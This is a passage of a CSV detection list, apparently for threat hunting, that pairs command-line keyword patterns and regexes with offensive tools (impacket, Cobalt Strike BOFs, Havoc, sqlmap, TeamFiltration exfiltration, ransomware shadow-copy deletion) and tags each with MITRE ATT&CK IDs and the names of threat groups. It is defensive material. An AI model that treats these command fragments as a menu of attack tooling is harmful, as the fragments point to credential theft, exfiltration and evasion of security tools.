TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -d * -t zonewalk > *",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk\s\>\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -d * -t zonewalk*",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2480","525","2024-04-29T05:52:23Z","2010-12-16T03:25:49Z" "* -d * -u * -p * --listener * --target *$DC_HOST*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\s.{0,1000}\s\-\-target\s.{0,1000}\$DC_HOST.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -d * -u *\* -p * --da*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\\.{0,1000}\s\-p\s.{0,1000}\s\-\-da.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - 
T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* -d *Active Protection DLL for SylantStrike*",".{0,1000}\s\-d\s.{0,1000}Active\sProtection\sDLL\sfor\sSylantStrike.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point execution","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* -d:sleepmask*",".{0,1000}\s\-d\:sleepmask.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "* daap-get-library.nse*",".{0,1000}\sdaap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dacledit.py*",".{0,1000}\sdacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -daisyserver *",".{0,1000}\s\-daisyserver\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* darkcodersc *",".{0,1000}\sdarkcodersc\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1060","181","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z" "* darkexe.py*",".{0,1000}\sdarkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "* --DataDirectory * --CookieAuthentication * --DisableNetwork * --hush --SocksPort * -f * 
--ControlPort * --ControlPortWriteToFile *",".{0,1000}\s\-\-DataDirectory\s.{0,1000}\s\-\-CookieAuthentication\s.{0,1000}\s\-\-DisableNetwork\s.{0,1000}\s\-\-hush\s\-\-SocksPort\s.{0,1000}\s\-f\s.{0,1000}\s\-\-ControlPort\s.{0,1000}\s\-\-ControlPortWriteToFile\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "* daytime.nse*",".{0,1000}\sdaytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* db2-das-info.nse*",".{0,1000}\sdb2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --dbms=mysql -u *",".{0,1000}\s\-\-dbms\=mysql\s\-u\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --dc * -m custom --filter *objectCategory*",".{0,1000}\s\-\-dc\s.{0,1000}\s\-m\scustom\s\-\-filter\s.{0,1000}objectCategory.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-host * -spn * -impersonate *",".{0,1000}\s\-dc\-host\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "* -dc-ip * -so *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\s\-so\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -dc-ip * -computer-pass *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -dc-ip * -dump *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-ip * -impersonate *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --dc-ip * -request * -format hashcat*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-request\s.{0,1000}\s\-format\shashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "* -dc-ip * -target-ip *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --dc-ip * --vuln --enabled*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-vuln\s\-\-enabled.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -dc-ip *SAMDump*",".{0,1000}\s\-dc\-ip\s.{0,1000}SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* dcow.c *",".{0,1000}\sdcow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* dcow.cpp*",".{0,1000}\sdcow\.cpp.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation 
tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "* -DDONUT_EXE *",".{0,1000}\s\-DDONUT_EXE\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* ddspoof.py*",".{0,1000}\sddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "* deadPool.ps1*",".{0,1000}\sdeadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "* --deauth * -a TR:GT:AP:BS:SS:ID wlan*",".{0,1000}\s\-\-deauth\s.{0,1000}\s\-a\sTR\:GT\:AP\:BS\:SS\:ID\swlan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --debug --exfil 
--onedrive*",".{0,1000}\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* decrypt *.aes.zip*",".{0,1000}\sdecrypt\s.{0,1000}\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* deepce.sh *--install*",".{0,1000}\sdeepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* default_logins.txt*",".{0,1000}\sdefault_logins\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "* Defense_Evasion.sh*",".{0,1000}\sDefense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team 
tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* DelegationBOF.c *",".{0,1000}\sDelegationBOF\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx64.o*",".{0,1000}\sdelegationx64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 
- T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx86.o*",".{0,1000}\sdelegationx86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delete shadow copies from *c:/ *",".{0,1000}\sdelete\sshadow\scopies\sfrom\s.{0,1000}c\:\/\s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "* deluge-rpc-brute.nse*",".{0,1000}\sdeluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dementor.py*",".{0,1000}\sdementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* demiguise.py*",".{0,1000}\sdemiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. 
There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* demon.x64.exe*",".{0,1000}\sdemon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "* Dendron.exe*",".{0,1000}\sDendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "* deploy_cobalt_beacon*",".{0,1000}\sdeploy_cobalt_beacon.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "* DesertFox.go",".{0,1000}\sDesertFox\.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "* -DestHost * -DestPort 5555 -UseDefaultProxy*",".{0,1000}\s\-DestHost\s.{0,1000}\s\-DestPort\s5555\s\-UseDefaultProxy.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "* detect-hooks.c *",".{0,1000}\sdetect\-hooks\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus 